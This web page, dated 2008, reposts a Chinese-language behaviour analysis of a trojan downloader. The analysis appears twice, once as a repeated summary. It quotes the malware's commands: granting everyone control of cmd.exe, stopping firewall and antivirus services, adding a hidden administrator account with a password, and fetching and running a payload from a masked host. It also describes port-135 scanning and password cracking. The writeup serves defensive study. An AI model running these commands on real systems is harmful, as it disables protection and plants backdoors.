| 订阅 | 在线投稿
分享
 
 
当前位置: 王朝网络 >> vb >> Win32.Troj.Downloader.vb.81920
 

Win32.Troj.Downloader.vb.81920

2008-08-14 23:09:38 编辑來源:互联网 繁體版 评论
 
 
  病毒名称(中文):

  肉鸡猎人81920

  病毒别名:

  

  

  威胁级别:

  ★★☆☆☆

  病毒类型:

  木马下载器

  病毒长度:

  81920

  影响系统:

  Win9xWinMeWinNTWin2000WinXPWin2003

  

  病毒行为:

  这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。

  1.释放病毒文件

  C:\Por.aed

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\2PF3QNZE\CA05MZGT.htm

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\C4DGV5NI\gx[1].jpg

  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\R146ZVU7\notepde[1].jpg

  C:\ProgramFiles\360safe\safemon\safemes.dll

  C:\WINDOWS\SoundMan.exe

  C:\WINDOWS\system32\interne.exe

  C:\WINDOWS\system32\Man.exe

  C:\WINDOWS\system32\no1.ini

  C:\WINDOWS\system32\note2.ini

  C:\WINDOWS\system32\notepde.exe

  C:\WINDOWS\system32\qoq.exe

  C:\WINDOWS\system32\ttjj5.ini

  2.创建服务并开启来加载文件,使其随系统启动

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundManSoundMan.exe

  映像劫持大量程序,添加360Loader.exe360Safe.exe360tray.exeIceSwordIparmor.exekmailmon.exerasruniep

  镜象劫持为"Debugger"="svchost.exe"添加ctfmon.exe为"Debugger"="SoundMan.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exeDebugger"SoundMan.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSwordDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exeDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exeDebugger"svchost.exe"

  .

  .

  .

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\rasDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiepDebugger"svchost.exe"

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exeDebugger"svchost.exe"

  修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL不显示隐藏文件

  删除安全软件的启动项

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunkavKavPFWvptrayruneipRavTaskRfwMain360Loader.exeras360Safe.exe360Safetray

  3.病毒生成文件中的网址由解密字符串得到

  CA05MZGT.htm

  gx[1].jpg

  notepde[1].jpg

  4.枚举进程判定当前进程里是否有"fint2005.exe""ehsniffer.exe""iris.exe"嗅探工具,不管有无都等待10分钟,连接网络

  InternetOpenUrlA读取InternetReadFilehttp://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg

  到c:\\windows\system32\vbb.exe运行

  "cacls.exeC:\WINDOWS\system32\cmd.exe/e/t/geveryone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制,

  cmd.exe/cnetstopwscsvc&netstopsharedaccess&scconfigsharedaccessstart=disabled&scconfigwscsvc

  start=disabled&netstopKPfwSvc&netstopKWatchsvc&netstopMcShield&netstop"NortonAntiVirusServer"

  停止安全软件的服务。

  5.搜索进程中是否含有kmailmon.exekavstart.exeshstat.exeruniep.exeras.exeMPG4C32.exeimsins.exeIparmor.exe

  360safe.exe360tray.execacls.execcenter.exe用TerminateProcess来结束

  6."cmd.exe/cnetusernew112369/add&

  netusernew112369&

  netusernew1/active:yes&

  netlocalgroupadministrators/add

  添加一个new1治理员帐号密码12369,将这些信息写入%windir%\1.inf,然后调用rundll32.exe来修改HelpandSupport服务

  C:\WINDOWS\system32\interne.exe,并删除1.inf.关闭临时登陆用户new1

  "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1"添加建值为0,(1为开启)

  不能创建删除用户"cmd.exe/cnetusernew1/del"

  7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd/crouteprint|find"DefaultGateway:">c:\ip.txt"

  获取网关地址到c:\ip.txt,然后从文件重读出网关地址,删除文件。

  8.判定当前进程有没有avp.exe有了修改日期2001年7月15日

  9.释放扫描器qoq.exe(DotpotPortReadyVer1.6)到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机,

  记录到Por.aed,扫描外网C段上4个段位的ip,"cmd.exe/cmove"c:\Por.aed""%SystemRoot%\system32\Por.aed"&exit"

  10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址"cmd.exe/cstartC:\\popo.exeip&exit"

  (如cmd.exe/cstartC:\\popo.exe192.1**.18.15&exit通过POPO.EXE进行扫字典密码破解)

  11.扫描完毕删除qoq.exe,Por.aed,popo.exe
 
 
 
 
上一篇《Win32.Troj.AutoRun.vb.73728》
下一篇《VBS.Downloader.v.1320》
 
 
 
 
 
 
日版宠物情人插曲《Winding Road》歌词

日版宠物情人2017的插曲,很带节奏感,日语的,女生唱的。 最后听见是在第8集的时候女主手割伤了,然后男主用嘴帮她吸了一下,插曲就出来了。 歌手:Def...

兄弟共妻,我成了他们夜里的美食

老钟家的两个儿子很特别,就是跟其他的人不太一样,魔一般的执着。兄弟俩都到了要结婚的年龄了,不管自家老爹怎么磨破嘴皮子,兄弟俩说不娶就不娶,老父母为兄弟两操碎了心...

如何磨出破洞牛仔裤?牛仔裤怎么剪破洞?

把牛仔裤磨出有线的破洞 1、具体工具就是磨脚石,下面垫一个硬物,然后用磨脚石一直磨一直磨,到把那块磨薄了,用手撕开就好了。出来的洞啊很自然的。需要猫须的话调几...

我就是扫描下图得到了敬业福和爱国福

先来看下敬业福和爱国福 今年春节,支付宝再次推出了“五福红包”活动,表示要“把欠大家的敬业福都还给大家”。 今天该活动正式启动,和去年一样,需要收集“五福”...

冰箱异味产生的原因和臭味去除的方法

有时候我们打开冰箱就会闻到一股异味,冰箱里的这种异味是因为一些物质发出的气味的混合体,闻起来让人恶心。 产生这些异味的主要原因有以下几点。 1、很多人有这种习...

 
 
 
病毒名称(中文): 肉鸡猎人81920 病毒别名: 威胁级别: ★★☆☆☆ 病毒类型: 木马下载器 病毒长度: 81920 影响系统: Win9xWinMeWinNTWin2000WinXPWin2003 病毒行为: 这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。 1.释放病毒文件 C:\Por.aed C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\2PF3QNZE\CA05MZGT.htm C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\C4DGV5NI\gx[1].jpg C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\R146ZVU7\notepde[1].jpg C:\ProgramFiles\360safe\safemon\safemes.dll C:\WINDOWS\SoundMan.exe C:\WINDOWS\system32\interne.exe C:\WINDOWS\system32\Man.exe C:\WINDOWS\system32\no1.ini C:\WINDOWS\system32\note2.ini C:\WINDOWS\system32\notepde.exe C:\WINDOWS\system32\qoq.exe C:\WINDOWS\system32\ttjj5.ini 2.创建服务并开启来加载文件,使其随系统启动 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundManSoundMan.exe 映像劫持大量程序,添加360Loader.exe360Safe.exe360tray.exeIceSwordIparmor.exekmailmon.exerasruniep 镜象劫持为"Debugger"="svchost.exe"添加ctfmon.exe为"Debugger"="SoundMan.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe Debugger "SoundMan.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe Debugger "svchost.exe" . . . HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep Debugger "svchost.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe Debugger "svchost.exe" 修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL不显示隐藏文件 删除安全软件的启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunkavKavPFWvptrayruneipRavTaskRfwMain360Loader.exeras360Safe.exe360Safetray 3.病毒生成文件中的网址由解密字符串得到 CA05MZGT.htm gx[1].jpg notepde[1].jpg 4.枚举进程判定当前进程里是否有"fint2005.exe""ehsniffer.exe""iris.exe"嗅探工具,不管有无都等待10分钟,连接网络 InternetOpenUrlA读取InternetReadFilehttp://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg 到c:\\windows\system32\vbb.exe运行 "cacls.exeC:\WINDOWS\system32\cmd.exe/e/t/geveryone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制, cmd.exe/cnetstopwscsvc&netstopsharedaccess&scconfigsharedaccessstart=disabled&scconfigwscsvc start=disabled&netstopKPfwSvc&netstopKWatchsvc&netstopMcShield&netstop"NortonAntiVirusServer" 停止安全软件的服务。 5.搜索进程中是否含有kmailmon.exekavstart.exeshstat.exeruniep.exeras.exeMPG4C32.exeimsins.exeIparmor.exe 360safe.exe360tray.execacls.execcenter.exe用TerminateProcess来结束 6."cmd.exe/cnetusernew112369/add& netusernew112369& netusernew1/active:yes& netlocalgroupadministrators/add 添加一个new1治理员帐号密码12369,将这些信息写入%windir%\1.inf,然后调用rundll32.exe来修改HelpandSupport服务 C:\WINDOWS\system32\interne.exe,并删除1.inf.关闭临时登陆用户new1 "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1"添加建值为0,(1为开启) 不能创建删除用户"cmd.exe/cnetusernew1/del" 7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd/crouteprint|find"DefaultGateway:">c:\ip.txt" 获取网关地址到c:\ip.txt,然后从文件重读出网关地址,删除文件。 8.判定当前进程有没有avp.exe有了修改日期2001年7月15日 9.释放扫描器qoq.exe(DotpotPortReadyVer1.6)到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机, 记录到Por.aed,扫描外网C段上4个段位的ip,"cmd.exe/cmove"c:\Por.aed""%SystemRoot%\system32\Por.aed"&exit" 10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址"cmd.exe/cstartC:\\popo.exeip&exit" (如cmd.exe/cstartC:\\popo.exe192.1**.18.15&exit通过POPO.EXE进行扫字典密码破解) 11.扫描完毕删除qoq.exe,Por.aed,popo.exe
󰈣󰈤
 
 
 
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
可爱小魔女
夏日小桃红
琦吖囡半熟乖巧清新写真
天使的微笑
痞子的甘南日记
疑是银河落九天
雪域坝上四——纯美色
冬日恋歌——西城杨柳弄轻柔
 
>>返回首页<<
 
 
 为你推荐
 
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 热帖排行
 
 
 
 
©2005- 王朝网络 版权所有